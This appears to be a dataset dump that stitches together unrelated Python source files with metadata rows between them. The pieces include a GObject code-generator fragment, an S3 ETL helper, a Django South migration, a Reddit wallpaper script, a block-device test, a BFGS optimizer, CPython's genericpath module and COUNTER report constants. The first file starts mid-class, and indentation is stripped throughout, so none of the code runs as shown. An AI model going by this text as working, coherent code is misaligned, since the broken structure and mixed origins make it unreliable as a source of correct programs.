def _setup_genum_symbols(self, enum):
self._template_processor["enum"] = enum
self._template_processor["ENUM_NAME"] = self._name_creator.replace_camel_case(enum.name, "_").upper()
self._template_processor["FullEnumName"] = self._template_processor.getSymbol("ModulePrefix") + enum.name
prefix = self._name_creator.replace_camel_case(enum.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["enum_prefix"] = prefix
def _setup_gflags_symbols(self, flags):
self._template_processor["flags"] = flags
prefix = self._name_creator.replace_camel_case(flags.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["flags_prefix"] = prefix
def _setup_gerror_symbols(self, error_domain):
self._template_processor["error_domain"] = error_domain
prefix = self._name_creator.replace_camel_case(error_domain.name, "_").lower()
module_prefix = self._template_processor.getSymbol("module_prefix")
if module_prefix:
prefix = module_prefix + "_" + prefix
self._template_processor["error_domain_prefix"] = prefix
def _header_comment(self):
if not self._config.header_text_file:
return """/*
* This file has been automatically generated by GObjectCreator3
* (see https://github.com/ThomasBollmeier/GObjectCreator3 for details)
*/
"""
else:
f = open(self._config.header_text_file)
res = f.read()
f.close()
return res
def _increment(self, value):
return value + 1
def _is_empty(self, data):
return not data
def _is_none(self, data):
return data is None
def _to_upper(self, text):
return text.upper()
def _to_lower(self, text):
return text.lower()
def _literal_trim(self, text):
if len(text) > 2:
return text[1:-1]
else:
return ""
def _length(self, data):
return len(data)
def _method_result(self, method):
result_type = "void"
for p in method.parameters:
type_name = self._name_creator.create_full_type_name(p.type)
if isinstance(p.type, Type) and ( p.type.category == Type.OBJECT or p.type.category == Type.INTERFACE ):
type_name += "*"
if "const" in p.modifiers:
type_name = "const " + type_name
if p.direction == Parameter.OUT:
result_type = type_name
break
return self._rearrange_asterisk(result_type)
def _method_basename(self,
cls,
method_info
):
method_or_name, intf = method_info
if not isinstance(method_or_name, str):
res = method_or_name.name
else:
res = method_or_name
if intf:
method_prefix = intf.cfunc_prefix or intf.name.lower()
mod_prefix = self._module_prefix_relative(intf.module, cls.module)
if mod_prefix:
method_prefix = mod_prefix + "_" + method_prefix
res = method_prefix + "_" + res
return res
def _method_signature(self,
cls,
method,
suppress_param_names=False,
insert_line_breaks=True,
indent_level=1,
instance_name="self"
):
res = ""
params = []
for p in method.parameters:
type_name = self._name_creator.create_full_type_name(p.type)
if isinstance(p.type, Type) and ( p.type.category == Type.OBJECT or p.type.category == Type.INTERFACE ):
type_name += "*"
if "const" in p.modifiers:
type_name = "const " + type_name
if p.direction != Parameter.OUT:
params.append((type_name, p.name))
if not method.is_static:
cls_type = self._name_creator.create_full_type_name(cls)
params.insert(0, (cls_type + "*", instance_name))
if len(params) == 0:
res = "void"
elif len(params) == 1:
res = params[0][0]
if not suppress_param_names:
res = self._rearrange_asterisk(res, params[0][1])
else:
for param in params:
if res:
res += ", "
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
typename = param[0]
if not suppress_param_names:
res += self._rearrange_asterisk(typename, param[1])
else:
res += typename
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
return res
def _method_call_args(self,
method,
insert_line_breaks = True,
indent_level = 1,
instance_name = "self"
):
args = [p.name for p in method.parameters if p.direction != Parameter.OUT]
if not method.is_static:
args.insert(0, instance_name)
num_args = len(args)
if num_args == 0:
res = ""
elif num_args == 1:
res = args[0]
else:
res = ""
for arg in args:
if res:
res += ","
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
res += arg
if insert_line_breaks:
res += "\n"
res += indent_level * "\t"
return res
def _method_signature_by_name(self,
cls,
method_name,
suppress_param_names=False,
insert_line_breaks=True,
indent_level=1,
instance_name="self"
):
minfo = cls.get_method_info(method_name)
return self._method_signature(
minfo.def_origin,
minfo.method,
suppress_param_names,
insert_line_breaks,
indent_level,
instance_name
)
def _method_by_name(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
return minfo.method
def _method_def_class(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
if minfo:
return minfo.def_origin
else:
raise Exception("No class found for method '%s'" % method_name)
def _method_def_class_cast(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
defcls = minfo.def_origin
class_name = self._name_creator.replace_camel_case(defcls.name, "_").upper()
module_prefix = ""
module = defcls.module
while module and module.name:
if module_prefix:
module_prefix = "_" + module_prefix
module_prefix = module.name.upper() + module_prefix
module = module.module
res = class_name + "_CLASS"
if module_prefix:
res = module_prefix + "_" + res
return res
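# Illustrative result (the class and module names here are hypothetical):
# for a method defined on class "Window" living in module "myapp.ui",
# the cast-macro name returned above would be "MYAPP_UI_WINDOW_CLASS".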
def _signal_technical_name(self, signal):
return signal.name.replace("-", "_")
def _signal_section_defhandler(self, signal):
return "default_handler_" + self._signal_technical_name(signal)
def _rearrange_asterisk(self, typename, parname=None):
match = self._regex_type_w_ptrs.match(typename)
if match:
if parname:
typename = match.group(1)
parname = match.group(3) + parname
else:
typename = match.group(1) + " " + match.group(3)
if parname:
return typename + " " + parname
else:
return typename
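# Illustrative behaviour (assuming self._regex_type_w_ptrs captures the
# bare type name in group 1 and the run of '*' characters in group 3):
#   _rearrange_asterisk("GObject*")          -> "GObject *"
#   _rearrange_asterisk("GObject*", "self")  -> "GObject *self"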
def _property_flags(self, prop):
flags = ""
for access_mode in prop.access:
if flags:
flags += "|"
flags += {
PropAccess.READ: "G_PARAM_READABLE",
PropAccess.WRITE: "G_PARAM_WRITABLE",
PropAccess.INIT: "G_PARAM_CONSTRUCT",
PropAccess.INIT_ONLY: "G_PARAM_CONSTRUCT_ONLY"
}[access_mode]
return flags
def _property_value(self, val):
if val.literal:
return val.literal
elif val.number_info:
if not val.number_info.decimals:
return "%d" % val.number_info.digits
else:
return "%d.%d" % (val.number_info.digits, val.number_info.decimals)
elif val.code_info:
enum_name = self._name_creator.create_full_type_name(val.code_info.enumeration)
enum_name = self._name_creator.replace_camel_case(enum_name, "_").upper()
return enum_name + "_" + val.code_info.code_name
elif val.boolean is not None:
return val.boolean and "TRUE" or "FALSE"
def _property_gtype(self, gtype_value):
if gtype_value.gtype_id:
return gtype_value.gtype_id
else:
return self._name_creator.create_type_macro(gtype_value.type)
def _property_setter_section(self, prop):
return "setter_" + prop.name.replace("-", "_").lower()
def _property_getter_section(self, prop):
return "getter_" + prop.name.replace("-", "_").lower()
def _property_set_section(self, prop):
return "set_" + prop.name.replace("-", "_").lower()
def _property_get_section(self, prop):
return "get_" + prop.name.replace("-", "_").lower()
def _interface_impl_funcname(self, cls, intf, method_name):
method_prefix = intf.cfunc_prefix or intf.name.lower()
module_prefix = self._module_prefix_relative(intf.module, cls.module)
if module_prefix:
method_prefix = module_prefix + "_" + method_prefix
return method_prefix + "_" + method_name
def _is_property_init_required(self, obj):
if obj.get_properties():
return True
for intf in obj.interfaces:
if intf.properties:
return True
return False
def _module_prefix(self, module):
res = module.cfunc_prefix or module.name.lower()
curmod = module
while curmod.module:
curmod = curmod.module
tmp = curmod.cfunc_prefix or curmod.name.lower()
if tmp:
res = tmp + "_" + res
return res
def _module_prefix_relative(self, module, root):
res = ""
abspath_module = self._get_abs_module_path(module)
abspath_root = self._get_abs_module_path(root)
len_rootpath = len(abspath_root)
relpath = []
for idx, m in enumerate(abspath_module):
if not relpath and idx < len_rootpath and m == abspath_root[idx]:
continue
relpath.append(m)
for m in relpath:
if res:
res += "_"
res += m.cfunc_prefix or m.name.lower()
return res
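# Illustrative behaviour (module names are hypothetical; modules fall
# back to their lowercased names when no cfunc_prefix is set): for a
# class in module "app" referencing an interface from "app.ui.widgets",
# the relative prefix is "ui_widgets"; within the same module it is "".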
def _get_abs_module_path(self, module):
res = [module]
curmod = module
while curmod.module:
curmod = curmod.module
res.insert(0, curmod)
return res
|
apache-2.0
| 763,292,699,945,116,500
| 36.464824
| 127
| 0.539653
| false
| 4.250428
| true
| false
| false
|
klahnakoski/MySQL-to-S3
|
mysql_to_s3/__init__.py
|
1
|
1965
|
# encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski (kyle@lahnakoski.com)
#
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from mo_dots import wrap
from mo_logs import strings
from pyLibrary.aws import s3
def _key2etl(key):
"""
CONVERT S3 KEY TO ETL HEADER
S3 NAMING CONVENTION: a.b.c WHERE EACH IS A STEP IN THE ETL PROCESS
HOW TO DEAL WITH a->b AS AGGREGATION? b:a.c? b->c is agg: a.c:b
"""
key = s3.strip_extension(key)
tokens = []
s = 0
i = strings.find(key, [":", "."])
while i < len(key):
tokens.append(key[s:i])
tokens.append(key[i])
s = i + 1
i = strings.find(key, [":", "."], s)
tokens.append(key[s:i])
_reverse_aggs(tokens)
# tokens.reverse()
source = {
"id": format_id(tokens[0])
}
for i in range(2, len(tokens), 2):
source = {
"id": format_id(tokens[i]),
"source": source,
"type": "join" if tokens[i - 1] == "." else "agg"
}
return wrap(source)
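# Illustrative expansion (assuming strings.find returns len(key) when no
# further separator is found):
#   _key2etl("a.b.c") ->
#       {"id": "c", "type": "join",
#        "source": {"id": "b", "type": "join", "source": {"id": "a"}}}
#   _key2etl("a.c:b") -> the same shape, but the outer step has type "agg".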
def _reverse_aggs(seq):
# SHOW AGGREGATION IN REVERSE ORDER (ASSUME ONLY ONE)
for i in range(1, len(seq), 2):
if seq[i] == ":":
seq[i - 1], seq[i + 1] = seq[i + 1], seq[i - 1]
def format_id(value):
"""
:param value:
:return: int() IF POSSIBLE
"""
try:
return int(value)
except Exception:
return unicode(value)
def lt(l, r):
"""
:param l: left key
:param r: right key
:return: True if l<r
"""
if r is None or l is None:
return True
for ll, rr in zip(l, r):
if ll < rr:
return True
elif ll > rr:
return False
return False
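# Illustrative comparisons of sequence keys (a None on either side
# short-circuits to True):
#   lt((1, 2), (1, 3))  -> True
#   lt((1, 3), (1, 2))  -> False
#   lt((1, 2), (1, 2))  -> False
#   lt(None, (1, 2))    -> True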
|
mpl-2.0
| 562,157,114,475,749,760
| 21.586207
| 75
| 0.553181
| false
| 3.094488
| false
| false
| false
|
gamnor/olhoneles
|
montanha/migrations/0007_auto__add_pernaturebyyear__add_pernature.py
|
1
|
10393
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'PerNatureByYear'
db.create_table(u'montanha_pernaturebyyear', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('institution', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Institution'])),
('year', self.gf('django.db.models.fields.IntegerField')()),
('nature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.ExpenseNature'])),
('expensed', self.gf('django.db.models.fields.DecimalField')(max_digits=10, decimal_places=2)),
))
db.send_create_signal(u'montanha', ['PerNatureByYear'])
# Adding model 'PerNature'
db.create_table(u'montanha_pernature', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('institution', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Institution'])),
('legislature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Legislature'], null=True, blank=True)),
('date_start', self.gf('django.db.models.fields.DateField')()),
('date_end', self.gf('django.db.models.fields.DateField')()),
('nature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.ExpenseNature'])),
('expensed', self.gf('django.db.models.fields.DecimalField')(max_digits=10, decimal_places=2)),
))
db.send_create_signal(u'montanha', ['PerNature'])
def backwards(self, orm):
# Deleting model 'PerNatureByYear'
db.delete_table(u'montanha_pernaturebyyear')
# Deleting model 'PerNature'
db.delete_table(u'montanha_pernature')
models = {
u'montanha.archivedexpense': {
'Meta': {'object_name': 'ArchivedExpense'},
'collection_run': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.CollectionRun']"}),
'date': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mandate': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Mandate']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Supplier']"}),
'value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'})
},
u'montanha.collectionrun': {
'Meta': {'object_name': 'CollectionRun'},
'date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']"})
},
u'montanha.expense': {
'Meta': {'object_name': 'Expense'},
'date': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mandate': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Mandate']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Supplier']"}),
'value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'})
},
u'montanha.expensenature': {
'Meta': {'object_name': 'ExpenseNature'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
},
u'montanha.institution': {
'Meta': {'object_name': 'Institution'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'siglum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'})
},
u'montanha.legislator': {
'Meta': {'object_name': 'Legislator'},
'about': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'original_id': ('django.db.models.fields.TextField', [], {}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'montanha.legislature': {
'Meta': {'object_name': 'Legislature'},
'date_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
},
u'montanha.mandate': {
'Meta': {'object_name': 'Mandate'},
'date_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislator': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislator']"}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']"}),
'party': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.PoliticalParty']", 'null': 'True', 'blank': 'True'})
},
u'montanha.pernature': {
'Meta': {'object_name': 'PerNature'},
'date_end': ('django.db.models.fields.DateField', [], {}),
'date_start': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']", 'null': 'True', 'blank': 'True'}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"})
},
u'montanha.pernaturebyyear': {
'Meta': {'object_name': 'PerNatureByYear'},
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
u'montanha.politicalparty': {
'Meta': {'object_name': 'PoliticalParty'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'siglum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'wikipedia': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'montanha.supplier': {
'Meta': {'object_name': 'Supplier'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['montanha']
|
agpl-3.0
| -336,951,130,467,373,200
| 68.293333
| 151
| 0.560185
| false
| 3.423254
| false
| false
| false
|
roccoma504/reddit_wallpaper
|
reddit_mac_wallpaper.py
|
1
|
1030
|
#!/usr/bin/python
# This script changes the wallpaper of the current OSX desktop. It will change the wallpaper of the desktop on each screen but not each desktop.
from AppKit import NSWorkspace, NSScreen
from Foundation import NSURL
import os
import praw
import urllib
# Define the reddit object.
r = praw.Reddit(user_agent='User-Agent: osx:com.frocco.reddit_wallpaper:v0.1 (by /u/roclobster)')
# Retrieve and save the top image of /r/WQHD_Wallpaper
testfile = urllib.URLopener()
testfile.retrieve(list(r.get_subreddit('WQHD_Wallpaper').get_top(limit=1))[0].url, "reddit_wallpaper.jpg")
# Generate a fileURL for the desktop picture
file_url = NSURL.fileURLWithPath_(os.getcwd() + "/reddit_wallpaper.jpg")
# Get shared workspace
ws = NSWorkspace.sharedWorkspace()
# Iterate over all screens
for screen in NSScreen.screens():
# Tell the workspace to set the desktop picture
(result, error) = ws.setDesktopImageURL_forScreen_options_error_(file_url, screen, {}, None)
if error:
print error
exit(-1)
|
mit
| 7,633,890,986,158,433,000
| 33.366667
| 144
| 0.74466
| false
| 3.322581
| false
| false
| false
|
mulkieran/pyblk
|
tests/test_utils.py
|
1
|
1744
|
# -*- coding: utf-8 -*-
# Copyright (C) 2015 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Anne Mulhern <amulhern@redhat.com>
"""
tests.test_utils
================
Tests utilities.
.. moduleauthor:: mulhern <amulhern@redhat.com>
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import pyblk
from ._constants import GRAPH
class TestGraphUtils(object):
"""
Test utilities that work over networkx graphs.
"""
# pylint: disable=too-few-public-methods
def test_roots(self):
"""
Verify that roots are really roots.
"""
roots = pyblk.GraphUtils.get_roots(GRAPH)
in_degrees = GRAPH.in_degree(roots)
assert all(in_degrees[r] == 0 for r in roots)
|
gpl-2.0
| -5,400,782,520,455,736,000
| 32.538462
| 77
| 0.706995
| false
| 3.945701
| true
| false
| false
|
eljost/pysisyphus
|
deprecated/optimizers/BFGS.py
|
1
|
4901
|
#!/usr/bin/env python3
import matplotlib.pyplot as plt
import numpy as np
from pysisyphus.helpers import fit_rigid, procrustes
from pysisyphus.optimizers.BacktrackingOptimizer import BacktrackingOptimizer
# [1] Nocedal, Wright - Numerical Optimization, 2006
class BFGS(BacktrackingOptimizer):
def __init__(self, geometry, alpha=1.0, bt_force=20, **kwargs):
super(BFGS, self).__init__(geometry, alpha=alpha,
bt_force=bt_force,
**kwargs)
self.eye = np.eye(len(self.geometry.coords))
try:
self.inv_hessian = self.geometry.get_initial_hessian()
# ChainOfStates objects may not have get_initial_hessian
except AttributeError:
self.inv_hessian = self.eye.copy()
if (hasattr(self.geometry, "internal")
and (self.geometry.internal is not None)):
raise Exception("Have to add hessian projections etc.")
self.log("BFGS with align=True is somewhat broken right now, so "
"the images will be aligned only in the first iteration. "
)
def reset_hessian(self):
self.inv_hessian = self.eye.copy()
self.log("Resetted hessian")
def prepare_opt(self):
if self.is_cos and self.align:
procrustes(self.geometry)
# Calculate initial forces before the first iteration
self.coords.append(self.geometry.coords)
self.forces.append(self.geometry.forces)
self.energies.append(self.geometry.energy)
def scale_by_max_step(self, steps):
steps_max = np.abs(steps).max()
if steps_max > self.max_step:
fact = self.max_step / steps_max
"""
fig, ax = plt.subplots()
ax.hist(steps, bins=20)#"auto")
title = f"max(steps)={steps_max:.04f}, fact={fact:.06f}"
ax.set_title(title)
l1 = ax.axvline(x=self.max_step, c="k")
l2 = ax.axvline(x=-self.max_step, c="k")
ax.add_artist(l1)
ax.add_artist(l2)
fig.savefig(f"cycle_{self.cur_cycle:02d}.png")
plt.close(fig)
"""
steps *= self.max_step / steps_max
return steps
def optimize(self):
last_coords = self.coords[-1]
last_forces = self.forces[-1]
last_energy = self.energies[-1]
unscaled_steps = self.inv_hessian.dot(last_forces)
steps = self.scale_by_max_step(self.alpha*unscaled_steps)
new_coords = last_coords + steps
self.geometry.coords = new_coords
# Hessian rotation seems faulty right now ...
#if self.is_cos and self.align:
# (last_coords, last_forces, steps), _, self.inv_hessian = fit_rigid(
# self.geometry,
# (last_coords,
# last_forces,
# steps),
# hessian=self.inv_hessian)
new_forces = self.geometry.forces
new_energy = self.geometry.energy
skip = self.backtrack(new_forces, last_forces, reset_hessian=True)
if skip:
self.reset_hessian()
self.geometry.coords = last_coords
#self.scale_alpha(unscaled_steps, self.alpha)
return None
# Because we add the step later on we restore the original
# coordinates and set the appropriate energies and forces.
self.geometry.coords = last_coords
self.geometry.forces = new_forces
self.geometry.energy = new_energy
self.forces.append(new_forces)
self.energies.append(new_energy)
# [1] Eq. 6.5, gradient difference, minus force difference
y = -(new_forces - last_forces)
sigma = new_coords - last_coords
# [1] Eq. 6.7, curvature condition
curv_cond = sigma.dot(y)
if curv_cond < 0:
self.log(f"curvature condition {curv_cond:.07} < 0!")
rho = 1.0 / y.dot(sigma)
if ((np.array_equal(self.inv_hessian, self.eye))
# When align = True the above expression will evaluate to
# False. So we also check if we are in the first iteration.
or (self.cur_cycle == 0)):
# [1] Eq. 6.20, p. 143
beta = y.dot(sigma)/y.dot(y)
self.inv_hessian = self.eye*beta
self.log(f"Using initial guess for inverse hessian, beta={beta}")
# Inverse hessian update
A = self.eye - np.outer(sigma, y) * rho
B = self.eye - np.outer(y, sigma) * rho
self.inv_hessian = (A.dot(self.inv_hessian).dot(B)
+ np.outer(sigma, sigma) * rho)
return steps
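# Module-level sanity check, illustrative only (not used by pysisyphus):
# the inverse-hessian update above must satisfy the secant condition
# H_new.dot(y) == sigma, which can be verified on a toy 2D quadratic.
if __name__ == "__main__":
    A = np.array([[2.0, 0.3], [0.3, 1.0]])  # hessian of a model quadratic
    sigma = np.array([-0.5, -0.2])          # step
    y = A.dot(sigma)                        # gradient difference
    rho = 1.0 / y.dot(sigma)
    eye = np.eye(2)
    H_new = ((eye - rho * np.outer(sigma, y)).dot(eye)
             .dot(eye - rho * np.outer(y, sigma))
             + rho * np.outer(sigma, sigma))
    assert np.allclose(H_new.dot(y), sigma)
    print("BFGS secant condition fulfilled.")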
|
gpl-3.0
| -1,036,933,543,861,177,100
| 39.504132
| 86
| 0.550296
| false
| 3.758436
| false
| false
| false
|
ArcherSys/ArcherSys
|
Lib/genericpath.py
|
1
|
3883
|
"""
Path operations common to more than one OS
Do not use directly. The OS specific modules import the appropriate
functions from this module themselves.
"""
import os
import stat
__all__ = ['commonprefix', 'exists', 'getatime', 'getctime', 'getmtime',
'getsize', 'isdir', 'isfile', 'samefile', 'sameopenfile',
'samestat']
# Does a path exist?
# This is false for dangling symbolic links on systems that support them.
def exists(path):
"""Test whether a path exists. Returns False for broken symbolic links"""
try:
os.stat(path)
except OSError:
return False
return True
# This follows symbolic links, so both islink() and isdir() can be true
# for the same path on systems that support symlinks
def isfile(path):
"""Test whether a path is a regular file"""
try:
st = os.stat(path)
except OSError:
return False
return stat.S_ISREG(st.st_mode)
# Is a path a directory?
# This follows symbolic links, so both islink() and isdir()
# can be true for the same path on systems that support symlinks
def isdir(s):
"""Return true if the pathname refers to an existing directory."""
try:
st = os.stat(s)
except OSError:
return False
return stat.S_ISDIR(st.st_mode)
def getsize(filename):
"""Return the size of a file, reported by os.stat()."""
return os.stat(filename).st_size
def getmtime(filename):
"""Return the last modification time of a file, reported by os.stat()."""
return os.stat(filename).st_mtime
def getatime(filename):
"""Return the last access time of a file, reported by os.stat()."""
return os.stat(filename).st_atime
def getctime(filename):
"""Return the metadata change time of a file, reported by os.stat()."""
return os.stat(filename).st_ctime
# Return the longest prefix of all list elements.
def commonprefix(m):
"Given a list of pathnames, returns the longest common leading component"
if not m: return ''
s1 = min(m)
s2 = max(m)
for i, c in enumerate(s1):
if c != s2[i]:
return s1[:i]
return s1
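# Note that the comparison is character-wise, not per path component:
#   commonprefix(['/usr/lib', '/usr/local']) -> '/usr/l'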
# Are two stat buffers (obtained from stat, fstat or lstat)
# describing the same file?
def samestat(s1, s2):
"""Test whether two stat buffers reference the same file"""
return (s1.st_ino == s2.st_ino and
s1.st_dev == s2.st_dev)
# Are two filenames really pointing to the same file?
def samefile(f1, f2):
"""Test whether two pathnames reference the same actual file"""
s1 = os.stat(f1)
s2 = os.stat(f2)
return samestat(s1, s2)
# Are two open files really referencing the same file?
# (Not necessarily the same file descriptor!)
def sameopenfile(fp1, fp2):
"""Test whether two open file objects reference the same file"""
s1 = os.fstat(fp1)
s2 = os.fstat(fp2)
return samestat(s1, s2)
# Split a path in root and extension.
# The extension is everything starting at the last dot in the last
# pathname component; the root is everything before that.
# It is always true that root + ext == p.
# Generic implementation of splitext, to be parametrized with
# the separators
def _splitext(p, sep, altsep, extsep):
"""Split the extension from a pathname.
Extension is everything from the last dot to the end, ignoring
leading dots. Returns "(root, ext)"; ext may be empty."""
# NOTE: This code must work for text and bytes strings.
sepIndex = p.rfind(sep)
if altsep:
altsepIndex = p.rfind(altsep)
sepIndex = max(sepIndex, altsepIndex)
dotIndex = p.rfind(extsep)
if dotIndex > sepIndex:
# skip all leading dots
filenameIndex = sepIndex + 1
while filenameIndex < dotIndex:
if p[filenameIndex:filenameIndex+1] != extsep:
return p[:dotIndex], p[dotIndex:]
filenameIndex += 1
return p, p[:0]
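# Illustrative behaviour of the generic splitext (as exposed through
# posixpath.splitext / ntpath.splitext):
#   _splitext('foo.bar.baz', '/', None, '.')  -> ('foo.bar', '.baz')
#   _splitext('.cshrc', '/', None, '.')       -> ('.cshrc', '')
#   _splitext('dir.d/file', '/', None, '.')   -> ('dir.d/file', '')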
|
mit
| -4,081,050,003,796,660,000
| 28.195489
| 78
| 0.661087
| false
| 3.698095
| false
| false
| false
|
chill17/pycounter
|
pycounter/constants.py
|
1
|
6177
|
"""Constants used by pycounter."""
NS = {
'SOAP-ENV': "http://schemas.xmlsoap.org/soap/envelope/",
'sushi': "http://www.niso.org/schemas/sushi",
'sushicounter': "http://www.niso.org/schemas/sushi/counter",
'counter': "http://www.niso.org/schemas/counter",
}
METRICS = {
u"JR1": u"FT Article Requests",
u"JR1 GOA": u"Gold Open Access Article Requests",
u"BR1": u"Book Title Requests",
u"BR2": u"Book Section Requests",
u"DB1": [u"Regular Searches",
u"Searches-federated and automated",
u"Result Clicks",
u"Record Views"],
u"DB2": [u"Access denied: concurrent/simultaneous user license exceeded",
u"Access denied: content item not licensed"]
}
